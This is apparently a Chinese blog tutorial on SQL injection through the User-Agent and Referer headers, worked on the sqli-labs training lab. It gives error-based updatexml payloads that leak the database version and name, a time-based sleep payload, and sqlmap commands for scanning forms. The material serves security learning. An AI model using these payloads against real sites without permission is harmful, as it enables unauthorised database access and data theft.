【安全】P 2-11 HTTP头部的SQL注入

0X01 HTTP头中的注入介绍

在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如SQL注入中,用户提交的参数都会被代码中的某些措施进行过滤。
在这里插入图片描述

过滤掉用户直接提交的参数,但是对于HTTP头中
提交的内容很有可能就没有进行过滤。
例如HTTP头中 User-Agent、Referer、Cookies等。dui
在这里插入图片描述

0X02 HTTP User-Agent注入

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
在这里插入图片描述

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

Payload内容:
updatexml(xml_document,xpath_string,new_value):
第一个参数:XML文档对象名称。
第二个参数:XPath字符串。
第三个参数:替换查找到的符合条件的数据。

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or  '1'='1

成功执行
在这里插入图片描述

查看库名称

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or  '1'='1

在这里插入图片描述

构造sql语句再进行下一步操作

0X03 HTTP Referer注入

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
在这里插入图片描述

···
’ or (length(database())) >8 or if(1=1, sleep(5), null) or ‘1’ = '1
···
在这里插入图片描述

通过右下角的响应时间进行判断并继续构建SQL语句进行操作

0X04 sqlmap安全测试

Sqlmap自动搜索POST表单注入:sqlmap.py -u “http://ip/sqltest/post.php” --form
在这里插入图片描述

指定参数探测SQL注入:sqlmap -u http://xxx.xxx.com/Login.asp --data “n=1&p=1”
在这里插入图片描述

指定注入位置进行注入 ,在保存的文件中,对于参数的修改为*。
在这里插入图片描述
在这里插入图片描述

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值